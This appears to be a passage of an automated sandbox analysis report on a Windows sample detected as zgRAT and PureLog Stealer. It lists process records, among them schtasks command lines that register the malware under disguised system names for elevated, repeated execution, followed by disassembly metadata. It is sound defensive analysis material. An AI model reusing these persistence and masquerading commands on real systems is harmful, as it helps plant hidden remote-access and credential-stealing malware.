                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\user\RuntimeBroker.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:20
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\user\RuntimeBroker.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\user\RuntimeBroker.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:24
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:26
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "4ra1Fo2Zql" /sc ONLOGON /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:27
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:28
                                                    Start time:17:01:59
                                                    Start date:29/08/2024
                                                    Path:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    Imagebase:0x80000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:29
                                                    Start time:17:01:59
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat"
                                                    Imagebase:0x7ff663480000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:30
                                                    Start time:17:01:59
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:31
                                                    Start time:17:01:59
                                                    Start date:29/08/2024
                                                    Path:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    Imagebase:0xb70000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:32
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                                    Imagebase:0xb30000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 66%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:33
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\chcp.com
                                                    Wow64 process (32bit):false
                                                    Commandline:chcp 65001
                                                    Imagebase:0x7ff75dfd0000
                                                    File size:14'848 bytes
                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:34
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                                    Imagebase:0xa0000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:35
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Users\user\RuntimeBroker.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\RuntimeBroker.exe
                                                    Imagebase:0x10000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\RuntimeBroker.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\RuntimeBroker.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 66%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:36
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\PING.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:ping -n 10 localhost
                                                    Imagebase:0x7ff6c2380000
                                                    File size:22'528 bytes
                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:37
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Users\user\RuntimeBroker.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\RuntimeBroker.exe
                                                    Imagebase:0xf50000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:38
                                                    Start time:17:02:08
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe"
                                                    Imagebase:0xa50000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 66%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:39
                                                    Start time:17:02:09
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                                    Imagebase:0x400000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:41
                                                    Start time:17:02:11
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat"
                                                    Imagebase:0x7ff663480000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:42
                                                    Start time:17:02:11
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:43
                                                    Start time:17:02:11
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\chcp.com
                                                    Wow64 process (32bit):false
                                                    Commandline:chcp 65001
                                                    Imagebase:0x7ff75dfd0000
                                                    File size:14'848 bytes
                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:44
                                                    Start time:17:02:11
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\w32tm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    Imagebase:0x7ff76f740000
                                                    File size:108'032 bytes
                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:45
                                                    Start time:17:02:16
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                                    Imagebase:0x7d0000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                      Execution Graph

                                                      Execution Coverage:8.5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:4
                                                      Total number of Limit Nodes:0
                                                      execution_graph 7929 7ff84925ebc1 7931 7ff84925ebdf 7929->7931 7930 7ff84925ed26 QueryFullProcessImageNameA 7932 7ff84925ed84 7930->7932 7931->7930 7931->7931

                                                      Control-flow Graph

                                                      control_flow_graph 456 7ff848e60d48-7ff848e60d9b call 7ff848e607d8 458 7ff848e60da0-7ff848e60eb9 456->458 473 7ff848e60f08-7ff848e60f1d 458->473 474 7ff848e60ebb-7ff848e60f05 458->474 477 7ff848e60f1f-7ff848e60ff5 473->477 478 7ff848e60f1e 473->478 474->478 482 7ff848e60f07 474->482 486 7ff848e61044-7ff848e61050 477->486 487 7ff848e60ff7-7ff848e6103e 477->487 478->477 482->473 487->486
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5[_H$<O_^
                                                      • API String ID: 0-4097811043
                                                      • Opcode ID: 94d9bb98a2c71e4b015fc577f930ea84cb015a57518c107098052862070b8405
                                                      • Instruction ID: 84d5b83cfd44038e662f4c40e109f0d7c885f25d575dae9aea2c3affbc3e8588
                                                      • Opcode Fuzzy Hash: 94d9bb98a2c71e4b015fc577f930ea84cb015a57518c107098052862070b8405
                                                      • Instruction Fuzzy Hash: 8591F475D1CA9D8FE789EB2888693A97FE0FB96354F4401BAC049E72D2DB782805C711

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2091021560.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff849250000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID: FullImageNameProcessQuery
                                                      • String ID: YjJn$YjJn
                                                      • API String ID: 3578328331-3436082983
                                                      • Opcode ID: 84839c5f0f59901dac8c3336e536c6f7705bfeb47d92d9d21e00a28f9321ff85
                                                      • Instruction ID: 9fb998b54ff0f02e5f96bbdae94758ec432d253a9a3afcc51bf61fbfd873e38b
                                                      • Opcode Fuzzy Hash: 84839c5f0f59901dac8c3336e536c6f7705bfeb47d92d9d21e00a28f9321ff85
                                                      • Instruction Fuzzy Hash: C171B430518A8C8FEBA8EF28D8597F977D1FB59311F04427EE85EC7292CB7498418B81
                                                      • Instruction ID: c48ea8f83d4bdf98d42c17b782ee6a8e6d6751725dcda34e9f4d2d08d944673f
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: E4B01200C6E40F04E408317B084206470407FC4144FC00070D40C70182AA9D3094034A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77f7a49e0c10c06559478b634e68d0346cc0f4194de041313ebbd4f8c8eeed39
                                                      • Instruction ID: f8840054db8d650e989fb18c260a0f81d9a5371f3e4934b46aa4aa775b6be3e5
                                                      • Opcode Fuzzy Hash: 77f7a49e0c10c06559478b634e68d0346cc0f4194de041313ebbd4f8c8eeed39
                                                      • Instruction Fuzzy Hash: 1D51D575A18AAD8EE78CEB2884687B97FE0FB96364F8001BEC049E73D1DBB51415C710
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: c9$!k9$"s9$#{9
                                                      • API String ID: 0-1692736845
                                                      • Opcode ID: 3dacdf391927056b34a4cbdcbaced78a33bf6899cda38ba5b813a2fe60b0d8bc
                                                      • Instruction ID: 044a3ba0cf1e019f55236ba56aa21ddff844068ee5ed982584dabd1b33190a10
                                                      • Opcode Fuzzy Hash: 3dacdf391927056b34a4cbdcbaced78a33bf6899cda38ba5b813a2fe60b0d8bc
                                                      • Instruction Fuzzy Hash: 50516ADBADE9637DE21D32BDB0011F96B44EF812B9F4C9677E14C890834E18648686FD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5Y_H$<M_^
                                                      • API String ID: 0-383103648
                                                      • Opcode ID: 232dae369ca5a4778e365abe1d31ffd831cc82d411ff97e00e1ca4cf05adc193
                                                      • Instruction ID: b9a12990cd1914d41661e6d702d3ba9f5febd862da71100494d904b03ef8ea09
                                                      • Opcode Fuzzy Hash: 232dae369ca5a4778e365abe1d31ffd831cc82d411ff97e00e1ca4cf05adc193
                                                      • Instruction Fuzzy Hash: 7F91E171D1DA898FE789EB2888253BABFE1FB5A350F4401BAC009D72D2DB791805C725
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2200974504.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff848e80000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9dff691df24974661235833bac1ff73f256b934370d368ffa76c1632886c7f7
                                                      • Instruction ID: 8457209454c74dbfaf49fc612621e4a4a010eb5f4921c5dd89e80d3d40075bd6
                                                      • Opcode Fuzzy Hash: f9dff691df24974661235833bac1ff73f256b934370d368ffa76c1632886c7f7
                                                      • Instruction Fuzzy Hash: 4051B271E28A5D8EE398EB1898557BABFE1FB9A350F4002BEC00AD77D1DBB51411C724
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 88131cd97783cfdd12df28a1ca4805787383d1c4153d0fc97d6dbda80628f66f
                                                      • Instruction ID: d3745b0a82bcc2046f84ad55a94024808df123bbacf786e738cc94f5f47f2085
                                                      • Opcode Fuzzy Hash: 88131cd97783cfdd12df28a1ca4805787383d1c4153d0fc97d6dbda80628f66f
                                                      • Instruction Fuzzy Hash: 7F517A71E0D59A9FEB58EFA8D4515FEB7B2FF45340F1040BAC01AE7282DA396905CB50
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: d8f22ab800e2985fd20c812062bb8b120fa946e6305f5723f72fe067e75e2bb8
                                                      • Instruction ID: b1f427a49eca5ec08e73ddb918193ab96cf39226df25d49168855f9cb5953cc1
                                                      • Opcode Fuzzy Hash: d8f22ab800e2985fd20c812062bb8b120fa946e6305f5723f72fe067e75e2bb8
                                                      • Instruction Fuzzy Hash: 79411831D1869E9FEB59DF94C8905BDBBB2FF49340F5040B9C02AA7282CB396901CB55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: H:%I
                                                      • API String ID: 0-2985027163
                                                      • Opcode ID: 658aede0181edba98ce3f6959707d3e64449f0a8d92c044b3e04f4af3056c14e
                                                      • Instruction ID: 9830f092c6731afe6c69e3a2cd7d767c8416bfb595b0e58b5acc5d3ba783350e
                                                      • Opcode Fuzzy Hash: 658aede0181edba98ce3f6959707d3e64449f0a8d92c044b3e04f4af3056c14e
                                                      • Instruction Fuzzy Hash: 7F113B31D0DAEA5FF775AA6488586BA37E6EF56390F0401BBD00DE71D2DE683C098360
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76f004e4dadc18be5513fcbf0fb3515d712acb788ffa24aca03961b9b4b2020f
                                                      • Instruction ID: 3f1a40fdb45b81c9e294543b9ff44d711ceb35d1d2096ab752be77b0799f8c97
                                                      • Opcode Fuzzy Hash: 76f004e4dadc18be5513fcbf0fb3515d712acb788ffa24aca03961b9b4b2020f
                                                      • Instruction Fuzzy Hash: BD329530A1CA598FEBA8EF18D895A7977E2FF58350B1041B9D01ED7392DA34EC45CB81
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7e6477a149ed3d33e9a4a414e651d53165ef7f8a5c5305d11d6b64eb6180252b
                                                      • Instruction ID: 487f969e9776cd26bfb99cf977ce521ec66cb8790a10ca1653b06f4f0662c428
                                                      • Opcode Fuzzy Hash: 7e6477a149ed3d33e9a4a414e651d53165ef7f8a5c5305d11d6b64eb6180252b
                                                      • Instruction Fuzzy Hash: EDF10D75748819DFDB88EB2CC4A5E7633D2EBACB50B114468E10EC76B6CD30EC418B92
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2204458871.00007FF849270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849270000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_7ff849270000_GrVEPTmsoNTbY.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e17c66d49f7228cf4569950f69e30768d4b70838e5268365c88d41ddb6f6339e
